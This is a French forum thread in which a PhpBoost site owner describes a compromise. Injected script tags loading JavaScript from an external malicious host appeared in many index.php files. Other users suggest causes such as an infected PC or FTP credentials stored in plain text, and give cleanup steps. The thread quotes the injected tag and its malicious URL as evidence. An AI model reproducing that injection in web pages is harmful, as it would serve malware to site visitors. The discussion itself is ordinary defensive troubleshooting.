Forum

Bonjour,

Un site que j'ai développé avec PhpBoost a été victime d'attaques il y a 2 jours.

Le résultat visible était que toute la partie public du site s'affichait en texte brut, plus de mise en page... En regardant le code source de la page, j'ai vu qu'il manquait tout le code correspondant au header.tpl et au footer.tpl.

En me connectant au serveur en FTP, j'ai vu grâce à la date de dernière modification que plusieurs fichiers avaient été ciblés.

Cela concernait tous les fichiers index.php situés dans tous les répertoires du site... et ils sont très nombreux puisque chaque répertoire en contient un. La plupart du temps ces fichiers n'ont pas d'autres utilités que de faire une redirection et les visiteurs ne les consultes pas.
Dans ces fichiers index, il y a eu des inclusions de code javascript du type :
<s c ri p t type="text/javascript" src="http://nw-cpm.cz.cc/media.js"> </s c r i p t >

Le fichier header.php situé dans le répertoire "kernel" a lui aussi été attaqué. Mais je n'ai pas pris le temps de regarder les modifications qui y avaient été faite.

Avez-vous déjà eu des attaques de ce type sur vos sites PhpBoost ?
Comment s'en protéger ?
Vu le nombre de fichier index.php dans l'arbo, comment puis-je facilement réuploader uniquement ces fichiers sans me les taper un à un ?

Merci d'avance

oui, mais ce n'est pas phpboost qui a causer ce souci.

j'ai eu deja ce type de souci sur 2 des 3 sites sur le serveur.
seul le site 'sain' n'etait pas dispo depuis un pc dows, qui etait viruser.

donc apres un changement de pass du ftp, et un passage au crible, ou restauration des fichier, il a fallu deveroler le pc infecter.

mais cela peut tres bien etre un autre script php qui aurais une faille de securité, ou le serveur qui serais compromis.
dans un premiers temps, change tes pass, et déverole pc et fichier.
si ton pc est sain, et que les "veroles" reviennes sur ton sites, c'est que tu a un script php qui a une faille, ou un script sur le serveur t'hebergeant.

dans ce cas fais des sauvegarde et passe tout au crible

ps : question annexe quel client ftp utilise tu ?
filezilla ayant un defaut de conception de securité les acces sont stoquer en clair dans un fichier.
la politique de mozzila sur ce client ftp etant que le pc mettant a dispo des fichier sur le net pour "tous" dois etre "sain".
tu peut eventuellement te tourner vers d'autres logiciel de transfert de fichier pour tester si c'est ton pc qui est vérolé dans le cas ou tu ne parviendrais pas a détecter le souci sur ta machine.

Perso, http://nw-cpm.cz.cc/media.js est considéré comme dangereux par chrome et le code <s c ri p t type="text/javascript" src="http://nw-cpm.cz.cc/media.js"> </s c r i p t > est repris plusieurs fois en tant que virus sur internet.



Benji

Oui sa c'est un fait.
Mais la question c'est comment s'en dépatouillé.

Merci pour vos réponses.



Pour info, j'utilise effectivement FileZila comme client FTP. Quel autre client FTP mieux sécurisé me recommander vous ?



Saturnin, tu dis :



Dans le cas d'une faille de script php, il s'agit bien d'un script de phpboost car mon site ne contient que les fichiers phpboost.



Vu le nombre de fichier index.php dans l'arbo, comment puis-je facilement réuploader uniquement ces fichiers sans me les taper un à un ?

Bonjour matsa

Tu peux reprendre l'archive de PHPBoost que tu as utilisé pour faire ton Site, complète, publication, etc...

Ensuite une fois Dézipé sur ton PC, tu va naviguer dans le dossier contenant tout les fichiers et supprimer tout ce qui n'est pas un fichier index.php

Garde les arborescence pour ces fichiers.
Puis envoi tout sur le FTP en choisissant l'option écraser tout.

Par exemple sa donnerais

index.php
admin - index.php
admin - menus - index.php

etc...

Merci FameLady pour ton conseil !
Ça va prendre un peu de temps (avec le nombre de sous-dossier) mais c'est sûrement le plus sûr pour ne rien oublier.